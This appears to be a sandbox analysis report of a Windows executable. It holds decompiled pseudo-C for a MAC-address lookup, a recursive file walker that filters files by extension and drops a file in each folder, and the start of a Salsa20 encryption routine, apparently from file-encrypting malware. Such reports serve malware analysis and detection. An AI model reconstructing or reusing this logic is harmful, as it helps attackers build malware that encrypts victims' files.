0x0040e737
0x0040e73c
0x0040e741
0x0040e741
0x0040e745
0x0040e754
0x0040e6c4
0x0040e6c5
0x0040e6d2
0x0040e6d4
0x0040e6d7
0x0040e6d9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e6d9
0x0040e699
0x0040e699
0x0040e699
0x0040e69e
0x0040e6a4
0x0040e6b3
0x0040e6b3

APIs

_malloc.LIBCMT ref: 0040E67F

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00820000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_malloc.LIBCMT ref: 0040E68B
_wprintf.LIBCMT ref: 0040E69E
_free.LIBCMT ref: 0040E6A4

Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
_free.LIBCMT ref: 0040E6C5
_malloc.LIBCMT ref: 0040E6CD
GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
_sprintf.LIBCMT ref: 0040E720
_wprintf.LIBCMT ref: 0040E732
_wprintf.LIBCMT ref: 0040E73C
_free.LIBCMT ref: 0040E745

Strings

Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
%02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
Address: %s, mac: %s, xrefs: 0040E72D

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
API String ID: 3901070236-1604013687
Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9

Uniqueness

Uniqueness Score: -1.00%

Function 00410160 Relevance: 26.2, APIs: 17, Instructions: 660
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00410160(intOrPtr __ecx, intOrPtr* __edx, char _a4, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _v76;
				signed int _v80;
				char _v96;
				signed int _v100;
				signed int _v104;
				WCHAR* _v108;
				short _v120;
				signed int _v124;
				signed int _v128;
				char _v144;
				intOrPtr* _v148;
				struct _WIN32_FIND_DATAW _v740;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t270;
				intOrPtr _t280;
				WCHAR* _t288;
				short _t291;
				signed int _t293;
				signed int _t294;
				signed int _t298;
				signed int _t299;
				intOrPtr _t303;
				WCHAR* _t308;
				void* _t309;
				void* _t313;
				void* _t330;
				signed int _t334;
				WCHAR* _t335;
				WCHAR* _t346;
				WCHAR* _t348;
				void* _t405;
				void* _t411;
				intOrPtr _t413;
				intOrPtr _t414;
				void* _t415;
				intOrPtr* _t418;
				signed int _t420;
				intOrPtr* _t423;
				signed int _t425;
				char* _t431;
				char* _t432;
				intOrPtr* _t434;
				signed int _t436;
				intOrPtr* _t439;
				intOrPtr* _t441;
				short* _t445;
				short* _t447;
				signed int _t450;
				signed int _t453;
				WCHAR* _t454;
				short* _t455;
				signed int _t460;
				intOrPtr* _t468;
				void* _t470;
				void* _t471;
				void* _t472;
				intOrPtr _t475;
				intOrPtr _t476;
				signed int _t477;
				signed int _t480;
				void* _t481;
				void* _t482;
				WCHAR* _t484;
				intOrPtr _t490;
				signed int* _t491;
				void* _t492;
				WCHAR* _t494;
				short _t495;
				intOrPtr _t496;
				void* _t497;
				void* _t498;
				short* _t501;
				short* _t502;
				void* _t503;
				short* _t504;

				_push(0xffffffff);
				_push(0x4cab68);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t496;
				_t497 = _t496 - 0x2d4;
				_t410 = __edx;
				_v72 = __ecx;
				_v148 = __edx;
				_v8 = 0;
				E00411AB0();
				_t480 = 0;
				_t490 = (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2);
				_v68 = _t490;
				if(_t490 == 0) {
					L15:
					_v76 = 7;
					_v80 = 0;
					_v96 = 0;
					_v8 = 3;
					_push(0xffffffff);
					_v44 = 7;
					 *((intOrPtr*)(_v72 + 0x8bc)) = 1;
					_push(0);
					_v64 = 0;
					_v48 = 0;
					E00414690(_t410,  &_v64,  &_a4);
					_v8 = 4;
					_t411 = PathFindFileNameW;
					_t267 =  >=  ? _v64 :  &_v64;
					_t468 = PathFindFileNameW( >=  ? _v64 :  &_v64);
					_v20 = 7;
					_v24 = 0;
					_v40 = 0;
					if( *_t468 != 0) {
						_t418 = _t468;
						_t79 = _t418 + 2; // 0x2
						_t490 = _t79;
						do {
							_t270 =  *_t418;
							_t418 = _t418 + 2;
						} while (_t270 != 0);
						_t420 = _t418 - _t490 >> 1;
						L24:
						_push(_t420);
						E00415C10(_t411,  &_v40, _t480, _t490, _t468);
						_v8 = 5;
						_t491 = E00413520( &_v64,  &_v144, 0, _v48 - _v24);
						if( &_v64 != _t491) {
							if(_v44 >= 8) {
								L00422587(_v64);
								_t497 = _t497 + 4;
							}
							_v44 = 7;
							_v48 = 0;
							_v64 = 0;
							if(_t491[5] >= 8) {
								_v64 =  *_t491;
								 *_t491 = 0;
							} else {
								_t384 = _t491[4] + 1;
								if(_t491[4] + 1 != 0) {
									E004205A0( &_v64, _t491, _t384 + _t384);
									_t497 = _t497 + 0xc;
								}
							}
							_v48 = _t491[4];
							_v44 = _t491[5];
							_t491[5] = 7;
							_t491[4] = 0;
							 *_t491 = 0;
						}
						if(_v124 >= 8) {
							L00422587(_v144);
							_t497 = _t497 + 4;
						}
						_t481 = 0;
						while(_v48 != 0 || _v24 != 0) {
							_t481 = _t481 + 1;
							_t278 =  >=  ? _v64 :  &_v64;
							_t468 = PathFindFileNameW( >=  ? _v64 :  &_v64);
							if( *_t468 != 0) {
								_t423 = _t468;
								_t109 = _t423 + 2; // 0x2
								_t491 = _t109;
								do {
									_t280 =  *_t423;
									_t423 = _t423 + 2;
								} while (_t280 != 0);
								_t425 = _t423 - _t491 >> 1;
								L42:
								_push(_t425);
								E00415C10(_t411,  &_v40, _t481, _t491, _t468);
								_t491 = E00413520( &_v64,  &_v144, 0, _v48 - _v24);
								if( &_v64 != _t491) {
									if(_v44 >= 8) {
										L00422587(_v64);
										_t497 = _t497 + 4;
									}
									_v44 = 7;
									_v48 = 0;
									_v64 = 0;
									if(_t491[5] >= 8) {
										_v64 =  *_t491;
										 *_t491 = 0;
									} else {
										_t372 = _t491[4] + 1;
										if(_t491[4] + 1 != 0) {
											E004205A0( &_v64, _t491, _t372 + _t372);
											_t497 = _t497 + 0xc;
										}
									}
									_v48 = _t491[4];
									_v44 = _t491[5];
									_t491[5] = 7;
									_t491[4] = 0;
									 *_t491 = 0;
								}
								if(_v124 >= 8) {
									L00422587(_v144);
									_t497 = _t497 + 4;
								}
								continue;
							}
							_t425 = 0;
							goto L42;
						}
						if(_t481 > 3) {
							L73:
							if(_v20 >= 8) {
								L00422587(_v40);
								_t497 = _t497 + 4;
							}
							_v8 = 3;
							_v20 = 7;
							_v24 = 0;
							_v40 = 0;
							if(_v44 >= 8) {
								L00422587(_v64);
								_t497 = _t497 + 4;
							}
							_t288 = E00417140( &_v144,  &_a4, "*");
							_t498 = _t497 + 4;
							if(_t288[0xa] >= 8) {
								_t288 =  *_t288;
							}
							_t482 = FindFirstFileW(_t288,  &_v740);
							if(_v124 >= 8) {
								L00422587(_v144);
								_t498 = _t498 + 4;
							}
							_v124 = 7;
							_t492 = 0;
							_v128 = 0;
							_v144 = 0;
							if(_t482 == 0xffffffff) {
								L119:
								if(_v76 >= 8) {
									L00422587(_v96);
									_t498 = _t498 + 4;
								}
								_t291 = 0;
								_v76 = 7;
								_v80 = 0;
								_v96 = 0;
								goto L122;
							} else {
								_t413 = _a28;
								do {
									_t431 = ".";
									_t293 =  &(_v740.cFileName);
									while(1) {
										_t470 =  *_t293;
										if(_t470 !=  *_t431) {
											break;
										}
										if(_t470 == 0) {
											L88:
											_t294 = 0;
											L90:
											if(_t294 == 0) {
												goto L117;
											}
											_t432 = L"..";
											_t298 =  &(_v740.cFileName);
											while(1) {
												_t471 =  *_t298;
												if(_t471 !=  *_t432) {
													break;
												}
												if(_t471 == 0) {
													L96:
													_t299 = 0;
													L98:
													if(_t299 == 0) {
														goto L117;
													}
													if((_v740.dwFileAttributes & 0x00000010) == 0) {
														_t492 = _t492 + 1;
														if(_t492 >= 0x400) {
															_t492 = 0;
															E00411AB0();
														}
														_v20 = 7;
														_push(0xffffffff);
														_push(0);
														_v40 = 0;
														_v24 = 0;
														E00414690(_t413,  &_v40,  &_a4);
														_v8 = 9;
														if(_v740.cFileName != 0) {
															_t434 =  &(_v740.cFileName);
															_t231 = _t434 + 2; // 0x2
															_t472 = _t231;
															do {
																_t303 =  *_t434;
																_t434 = _t434 + 2;
															} while (_t303 != 0);
															_t436 = _t434 - _t472 >> 1;
															goto L108;
														} else {
															_t436 = 0;
															L108:
															_push(_t436);
															E00415AE0(_t413,  &_v40, _t482, _t492,  &(_v740.cFileName));
															_t307 =  >=  ? _v40 :  &_v40;
															_t308 = PathFindExtensionW( >=  ? _v40 :  &_v40);
															_t439 = _v72 + 0x868;
															if( *((intOrPtr*)(_t439 + 0x14)) >= 8) {
																_t439 =  *_t439;
															}
															_push(_t308);
															_push(_t439);
															_t309 = E00421C02(_t439);
															_t498 = _t498 + 8;
															if(_t309 == 0) {
																_t441 = _v72 + 0x820;
																if( *((intOrPtr*)(_t441 + 0x14)) >= 8) {
																	_t441 =  *_t441;
																}
																_push(_t441);
																_t312 =  >=  ? _v40 :  &_v40;
																_push( >=  ? _v40 :  &_v40);
																_t313 = E00421C02(_t441);
																_t498 = _t498 + 8;
																if(_t313 == 0) {
																	E004136C0(_t413,  &_v40);
																}
															}
															L115:
															_v8 = 3;
															if(_v20 >= 8) {
																L00422587(_v40);
																_t498 = _t498 + 4;
															}
															goto L117;
														}
													}
													E00417140( &_v40,  &_a4,  &(_v740.cFileName));
													_push(1);
													_v8 = 8;
													E00415AE0(_t413,  &_v40, _t482, _t492, "\\");
													_push(_t413);
													_t501 = _t498 + 4 - 0x18;
													_t445 = _t501;
													_push(0xffffffff);
													 *(_t445 + 0x14) = 7;
													 *(_t445 + 0x10) = 0;
													_push(0);
													 *_t445 = 0;
													E00414690(_t413, _t445,  &_v40);
													E00410160(_v72, _v148);
													_t498 = _t501 + 0x1c;
													goto L115;
												}
												_t475 =  *((intOrPtr*)(_t298 + 2));
												_t209 =  &(_t432[2]); // 0x2e
												if(_t475 !=  *_t209) {
													break;
												}
												_t298 = _t298 + 4;
												_t432 =  &(_t432[4]);
												if(_t475 != 0) {
													continue;
												}
												goto L96;
											}
											asm("sbb eax, eax");
											_t299 = _t298 | 0x00000001;
											goto L98;
										}
										_t476 =  *((intOrPtr*)(_t293 + 2));
										_t206 =  &(_t431[2]); // 0x2e0000
										if(_t476 !=  *_t206) {
											break;
										}
										_t293 = _t293 + 4;
										_t431 =  &(_t431[4]);
										if(_t476 != 0) {
											continue;
										}
										goto L88;
									}
									asm("sbb eax, eax");
									_t294 = _t293 | 0x00000001;
									goto L90;
									L117:
								} while (FindNextFileW(_t482,  &_v740) != 0);
								FindClose(_t482);
								goto L119;
							}
						}
						_t502 = _t497 - 0x18;
						_t447 = _t502;
						_push(0xffffffff);
						 *(_t447 + 0x14) = 7;
						 *(_t447 + 0x10) = 0;
						_push(0);
						 *_t447 = 0;
						E00414690(_t411, _t447,  &_a4);
						_t330 = E0040F310(_t481, _t491);
						_t497 = _t502 + 0x18;
						if(_t330 != 0) {
							goto L73;
						}
						_push(0xffffffff);
						_push(0);
						E00414690(_t411,  &_v96,  &_a4);
						E00413A90(_t411,  &_v108, _t481, 0x400);
						_v8 = 6;
						_t450 = 0;
						_t334 = _v80;
						_t494 = _v108;
						if(_t334 == 0) {
							L57:
							_t414 = _v72;
							 *((short*)(_t494 + 2 + _t334 * 2)) = 0;
							_t335 = _t414 + 0x820;
							if(_t335[0xa] >= 8) {
								_t335 =  *_t335;
							}
							PathAppendW(_t494, _t335);
							_push(_v68);
							_v124 = 7;
							_v128 = 0;
							_v144 = 0;
							E00418400( &_v144, _t494, _v104);
							if(_v76 >= 8) {
								L00422587(_v96);
								_t497 = _t497 + 4;
							}
							_t453 = _v124;
							_v76 = 7;
							_v80 = 0;
							_v96 = 0;
							if(_t453 >= 8) {
								_v96 = _v144;
							} else {
								_t356 = _v128 + 1;
								if(_v128 + 1 != 0) {
									E004205A0( &_v96,  &_v144, _t356 + _t356);
									_t453 = _v124;
									_t497 = _t497 + 0xc;
								}
							}
							_v80 = _v128;
							_t343 =  >=  ? _v96 :  &_v96;
							_v76 = _t453;
							if(PathFileExistsW( >=  ? _v96 :  &_v96) == 0) {
								_t346 = E00420C62(_t414, _t468, _t481, 0x7d00);
								_t454 = _t414 + 0x838;
								_t503 = _t497 + 4;
								_t484 = _t346;
								if(_t454[0xa] >= 8) {
									_t454 =  *_t454;
								}
								lstrcpyW(_t484, _t454);
								_t348 = _t414 + 0x850;
								if( *((intOrPtr*)(_t414 + 0x864)) >= 8) {
									_t348 =  *_t348;
								}
								lstrcatW(_t484, _t348);
								_t504 = _t503 - 0x18;
								_t455 = _t504;
								_push(0xffffffff);
								 *(_t455 + 0x14) = 7;
								 *(_t455 + 0x10) = 0;
								_push(0);
								 *_t455 = 0;
								E00414690(_t414, _t455,  &_v96);
								E0040F0E0(_t484);
								E00420BED(_t484);
								_t497 = _t504 + 0x1c;
							}
							if(_t494 != 0) {
								L00422587(_t494);
								_t497 = _t497 + 4;
							}
							goto L73;
						}
						do {
							_t363 =  >=  ? _v96 :  &_v96;
							_t494[_t450] = ( >=  ? _v96 :  &_v96)[_t450];
							_t450 = _t450 + 1;
							_t334 = _v80;
						} while (_t450 < _t334);
						goto L57;
					}
					_t420 = 0;
					goto L24;
				} else {
					_t415 = 0;
					do {
						_v20 = 7;
						_push(0xffffffff);
						_push(0);
						_v40 = 0;
						_v24 = 0;
						E00414690(_t415,  &_v40,  &_a4);
						_v8 = 1;
						_push(0xffffffff);
						_push(0);
						_v120 = 0;
						_v100 = 7;
						_v104 = 0;
						E00414690(_t415,  &_v120,  *_v148 + _t415);
						_v8 = 2;
						_t477 = _v24;
						if(_t477 <= 1) {
							L10:
							if(_v100 >= 8) {
								L00422587(_v120);
								_t497 = _t497 + 4;
							}
							_v100 = 7;
							_v8 = 0;
							_v104 = 0;
							_v120 = 0;
							if(_v20 >= 8) {
								L00422587(_v40);
								_t497 = _t497 + 4;
							}
							goto L14;
						}
						_t460 = _v104;
						if(_t460 <= 1) {
							goto L10;
						} else {
							_t400 =  >=  ? _v40 :  &_v40;
							if( *((short*)(( >=  ? _v40 :  &_v40) + _t477 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t415,  &_v40, _t480, _t490, "\\");
								_t460 = _v104;
							}
							_t495 = _v120;
							_t402 =  >=  ? _t495 :  &_v120;
							if( *((short*)(( >=  ? _t495 :  &_v120) + _t460 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t415,  &_v120, _t480, _t495, "\\");
								_t495 = _v120;
							}
							_t462 =  >=  ? _t495 :  &_v120;
							_t404 =  >=  ? _v40 :  &_v40;
							_t405 = E00420235(_t415, _t480, _t495,  >=  ? _v40 :  &_v40,  >=  ? _t495 :  &_v120);
							_t498 = _t497 + 8;
							if(_t405 == 0) {
								if(_v100 >= 8) {
									L00422587(_v120);
									_t498 = _t498 + 4;
								}
								_t291 = 0;
								_v100 = 7;
								_v104 = 0;
								_v120 = 0;
								if(_v20 >= 8) {
									_t291 = L00422587(_v40);
									_t498 = _t498 + 4;
								}
								L122:
								if(_a24 >= 8) {
									_t291 = L00422587(_a4);
								}
								 *[fs:0x0] = _v16;
								return _t291;
							} else {
								_t490 = _v68;
								goto L10;
							}
						}
						L14:
						_t480 = _t480 + 1;
						_t415 = _t415 + 0x18;
					} while (_t480 < _t490);
					goto L15;
				}
			}

0x00410163
0x00410165
0x00410170
0x00410171
0x00410178
0x00410180
0x00410182
0x00410186
0x0041018c
0x00410193
0x004101a2
0x004101b1
0x004101b3
0x004101b6
0x004102e8
0x004102ea
0x004102f1
0x004102f8
0x00410302
0x00410306
0x00410308
0x0041030f
0x0041031b
0x0041031c
0x00410324
0x0041032b
0x00410330
0x0041033b
0x00410341
0x00410348
0x0041034a
0x00410353
0x0041035a
0x00410361
0x004103a6
0x004103a8
0x004103a8
0x004103b0
0x004103b0
0x004103b3
0x004103b6
0x004103bd
0x004103bf
0x004103bf
0x004103c4
0x004103c9
0x004103e5
0x004103ec
0x004103f2
0x004103f7
0x004103fc
0x004103fc
0x00410401
0x00410408
0x0041040f
0x00410417
0x00410433
0x00410436
0x00410419
0x0041041c
0x0041041d
0x00410427
0x0041042c
0x0041042c
0x0041041d
0x0041043f
0x00410445
0x0041044a
0x00410451
0x00410458
0x00410458
0x0041045f
0x00410467
0x0041046c
0x0041046c
0x0041046f
0x00410471
0x00410481
0x00410489
0x00410490
0x00410496
0x0041049c
0x0041049e
0x0041049e
0x004104a1
0x004104a1
0x004104a4
0x004104a7
0x004104ae
0x004104b0
0x004104b0
0x004104b5
0x004104d2
0x004104d9
0x004104df
0x004104e4
0x004104e9
0x004104e9
0x004104ee
0x004104f5
0x004104fc
0x00410504
0x00410520
0x00410523
0x00410506
0x00410509
0x0041050a
0x00410514
0x00410519
0x00410519
0x0041050a
0x0041052c
0x00410532
0x00410537
0x0041053e
0x00410545
0x00410545
0x0041054c
0x00410558
0x0041055d
0x0041055d
0x00000000
0x0041054c
0x00410498
0x00000000
0x00410498
0x00410568
0x00410728
0x0041072c
0x00410731
0x00410736
0x00410736
0x0041073b
0x00410743
0x0041074a
0x00410751
0x00410755
0x0041075a
0x0041075f
0x0041075f
0x00410770
0x00410775
0x0041077c
0x0041077e
0x0041077e
0x00410792
0x00410794
0x0041079c
0x004107a1
0x004107a1
0x004107a6
0x004107ad
0x004107af
0x004107b6
0x004107c0
0x004109c7
0x004109cb
0x004109d0
0x004109d5
0x004109d5
0x004109d8
0x004109da
0x004109e1
0x004109e8
0x00000000
0x004107c6
0x004107c6
0x004107d0
0x004107d0
0x004107d5
0x004107e0
0x004107e0
0x004107e6
0x00000000
0x00000000
0x004107eb
0x00410802
0x00410802
0x0041080b
0x0041080d
0x00000000
0x00000000
0x00410813
0x00410818
0x00410820
0x00410820
0x00410826
0x00000000
0x00000000
0x0041082b
0x00410842
0x00410842
0x0041084b
0x0041084d
0x00000000
0x00000000
0x0041085a
0x004108bf
0x004108c6
0x004108c8
0x004108ca
0x004108ca
0x004108d1
0x004108d8
0x004108da
0x004108db
0x004108e5
0x004108ed
0x004108f2
0x004108fe
0x00410904
0x0041090a
0x0041090a
0x00410910
0x00410910
0x00410913
0x00410916
0x0041091d
0x00000000
0x00410900
0x00410900
0x0041091f
0x0041091f
0x0041092a
0x00410936
0x0041093b
0x00410944
0x0041094e
0x00410950
0x00410950
0x00410952
0x00410953
0x00410954
0x00410959
0x0041095e
0x00410963
0x0041096d
0x0041096f
0x0041096f
0x00410978
0x00410979
0x0041097d
0x0041097e
0x00410983
0x00410988
0x00410990
0x00410990
0x00410988
0x00410995
0x00410995
0x0041099d
0x004109a2
0x004109a7
0x004109a7
0x00000000
0x0041099d
0x004108fe
0x00410869
0x00410871
0x0041087b
0x0041087f
0x00410884
0x00410885
0x0041088a
0x0041088c
0x0041088e
0x00410895
0x0041089c
0x0041089d
0x004108a4
0x004108b2
0x004108b7
0x00000000
0x004108b7
0x0041082d
0x00410831
0x00410835
0x00000000
0x00000000
0x00410837
0x0041083a
0x00410840
0x00000000
0x00000000
0x00000000
0x00410840
0x00410846
0x00410848
0x00000000
0x00410848
0x004107ed
0x004107f1
0x004107f5
0x00000000
0x00000000
0x004107f7
0x004107fa
0x00410800
0x00000000
0x00000000
0x00000000
0x00410800
0x00410806
0x00410808
0x00000000
0x004109aa
0x004109b8
0x004109c1
0x00000000
0x004109c1
0x004107c0
0x0041056e
0x00410573
0x00410575
0x00410577
0x0041057e
0x00410585
0x00410586
0x0041058d
0x00410592
0x00410597
0x0041059c
0x00000000
0x00000000
0x004105a2
0x004105a4
0x004105ad
0x004105ba
0x004105bf
0x004105c3
0x004105c5
0x004105c8
0x004105cd
0x004105eb
0x004105eb
0x004105f0
0x004105f5
0x004105ff
0x00410601
0x00410601
0x00410605
0x0041060b
0x00410610
0x00410620
0x00410628
0x0041062f
0x00410638
0x0041063d
0x00410642
0x00410642
0x00410645
0x0041064a
0x00410651
0x00410658
0x0041065f
0x00410688
0x00410661
0x00410664
0x00410665
0x00410675
0x0041067a
0x0041067d
0x0041067d
0x00410665
0x00410691
0x00410697
0x0041069c
0x004106a7
0x004106ae
0x004106b3
0x004106b9
0x004106c0
0x004106c2
0x004106c4
0x004106c4
0x004106c8
0x004106d5
0x004106db
0x004106dd
0x004106dd
0x004106e1
0x004106e7
0x004106ec
0x004106ee
0x004106f0
0x004106f7
0x004106fe
0x004106ff
0x00410706
0x0041070d
0x00410713
0x00410718
0x00410718
0x0041071d
0x00410720
0x00410725
0x00410725
0x00000000
0x0041071d
0x004105d0
0x004105d7
0x004105df
0x004105e3
0x004105e4
0x004105e7
0x00000000
0x004105d0
0x00410363
0x00000000
0x004101bc
0x004101bc
0x004101c0
0x004101c2
0x004101c9
0x004101cb
0x004101cc
0x004101d6
0x004101de
0x004101eb
0x004101ef
0x004101f1
0x004101f6
0x004101fe
0x00410205
0x0041020c
0x00410211
0x00410215
0x0041021b
0x004102a3
0x004102a7
0x004102ac
0x004102b1
0x004102b1
0x004102b6
0x004102bd
0x004102c4
0x004102cb
0x004102cf
0x004102d4
0x004102d9
0x004102d9
0x00000000
0x004102cf
0x00410221
0x00410227
0x00000000
0x00410229
0x00410230
0x0041023a
0x0041023c
0x00410246
0x0041024b
0x0041024b
0x00410254
0x0041025a
0x00410263
0x00410265
0x0041026f
0x00410277
0x00410277
0x00410283
0x0041028b
0x00410290
0x00410295
0x0041029a
0x0041036b
0x00410370
0x00410375
0x00410375
0x00410378
0x0041037a
0x00410385
0x0041038c
0x00410390
0x00410399
0x0041039e
0x0041039e
0x004109ec
0x004109f0
0x004109f5
0x004109fa
0x00410a02
0x00410a0d
0x004102a0
0x004102a0
0x00000000
0x004102a0
0x0041029a
0x004102dc
0x004102dc
0x004102dd
0x004102e0
0x00000000
0x004101c0

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
_memmove.LIBCMT ref: 00410427
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
_memmove.LIBCMT ref: 00410514

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
Opcode Fuzzy Hash: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004382A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004382A2(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
					if(E00437413(_t28, ?str?) != 0) {
						return E00423C92(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}

0x004382a6
0x004382ab
0x004382d3
0x00000000
0x004382fc
0x004382ee
0x0043831a
0x00000000
0x0043831a
0x00000000
0x004382f0
0x00438318
0x00000000
0x00000000
0x0043831e
0x00438323
0x00438327
0x00438327
0x004382f5

APIs

_wcscmp.LIBCMT ref: 004382B9
_wcscmp.LIBCMT ref: 004382CA
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310

Strings

ACP, xrefs: 004382B3
OCP, xrefs: 004382C4

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E0040C070(intOrPtr __ecx, void* __edx, void* __esi, signed int* _a4, signed char* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v128;
				char _v190;
				void* __ebx;
				void* __edi;
				intOrPtr _t174;
				signed int _t186;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t229;
				signed int _t235;
				signed int _t237;
				void* _t244;
				intOrPtr _t248;
				signed char _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t258;
				signed int _t260;
				signed int _t262;
				signed int _t264;
				signed int _t266;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int* _t272;
				signed int _t276;
				signed int _t277;
				intOrPtr _t284;
				void* _t285;
				void* _t286;
				signed int _t288;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t292;
				signed char* _t293;
				signed int _t294;
				signed int _t295;
				signed char* _t296;
				void* _t297;
				signed int _t298;
				signed int _t299;
				char* _t301;
				void* _t303;
				void* _t305;
				void* _t313;

				_t297 = __esi;
				_t286 = __edx;
				_t251 = _a4;
				_t174 = __ecx;
				_v56 = __ecx;
				_t293 = _a8;
				if(_a4 == 0) {
					L2:
					_push(0x7a);
					E004211DD(_t251, _t286, _t293, _t297, _t309, L"input != nullptr && output != nullptr", L"e:\\doc\\my work (c++)\\_git\\encryption\\encryptionwinapi\\Salsa20.inl");
					_t174 = _v56;
				} else {
